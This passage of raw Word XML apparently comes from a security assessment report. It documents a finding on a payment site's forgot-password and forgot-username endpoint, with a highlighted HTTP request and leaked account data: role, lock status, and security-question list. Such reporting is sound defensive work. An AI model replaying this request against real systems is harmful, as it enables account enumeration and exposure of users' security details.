                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>userRoleEnum":"GOFUNDHIP</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>","userAccountStatus":{"disabled":false,"locked":true,"forceChangePassword":false,"badSecretAnsCount":0,"badPasswordCount":15,"lastLoginTime":null,"comments":null,"userNameValid":false,"secretQuestionValid":false},"memberOf":[],"ssoID":[],"secretQuestionAnswers":[{"</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>question":"What school did you attend for the third grade?"</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>,"answer":null,"encrypted":true,"questionValid":true},{"</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>question":"What is your maternal grandmother's maiden name?"</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>,"answer":null,"encrypted":true,"questionValid":true},{"question":"</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>What is your paternal grandfather's first name?</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>","answer":null,"encrypted":true,"questionValid":true}],"orgType":"WHIP_TPG","</w:t>
                  </w:r>
                  <w:r w:rsidRPr="009009DB">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>orgName":"Test</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00D1715D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>","authFlag":true}}</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="5E13CAEA" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="006A09D3" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006A09D3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>getUserIdDetails</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006A09D3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (from </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006A09D3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>forgotpassword</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006A09D3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006A09D3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>forgotusername</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006A09D3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> functions):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="385C552A" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="006A09D3" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP Request</w:t>
            </w:r>
            <w:r w:rsidRPr="006A09D3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="00A82FF7" w:rsidRPr="00EB0872" w14:paraId="6758E855" w14:textId="77777777" w:rsidTr="004E4D83">
              <w:trPr>
                <w:trHeight w:val="1915"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="493C0426" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="00EB0872" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00EB0872">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">POST </w:t>
                  </w:r>
                  <w:r w:rsidRPr="00EB0872">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00EB0872">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>paymentgateway</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00EB0872">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00EB0872">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>loginservices</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00EB0872">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>/v1/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00EB0872">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>gbd</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00EB0872">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>/account/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00EB0872">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>getUserIdDetails</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00EB0872">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> HTTP/1.1</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="1E78021E" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="00EB0872" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00EB0872">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Host: payment.sit2.va.anthem.com</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="7CF60A58" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="00EB0872" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00EB0872">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="05F7BCD2" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="00EB0872" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00EB0872">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>{</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="0C1378AB" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="00EB0872" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00EB0872">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">  "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>firstName</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>": "</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00EB0872">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00EB0872">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>",</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="6208EA52" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="00EB0872" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t xml:space="preserve">  "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>lastName</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>": "</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00EB0872">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00EB0872">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>",</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="0B124075" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="00EB0872" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t xml:space="preserve">  "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>phoneNumber</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>": "</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00EB0872">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00EB0872">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>",</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="563F74DC" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="00EB0872" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t xml:space="preserve">  "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>emailAddress</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>": "</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00EB0872">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00EB0872">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>"</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="5B730A24" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="00EB0872" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00EB0872">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>}</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="58D5FC3D" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="006A09D3" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006A09D3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP Response:</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="00A82FF7" w:rsidRPr="006A09D3" w14:paraId="3DC2B8B9" w14:textId="77777777" w:rsidTr="004E4D83">
              <w:trPr>
                <w:trHeight w:val="1263"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="243A9790" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="006A09D3" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>HTTP/1.1 200 OK</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="76D53C43" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="006A09D3" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Date: Thu, 30 May 2019 18:13:29 GMT</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="6D75C515" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="006A09D3" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="5A16A273" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="006A09D3" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Content-Length: 121</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="3162FE4E" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="006A09D3" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>{"</w:t>
                  </w:r>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
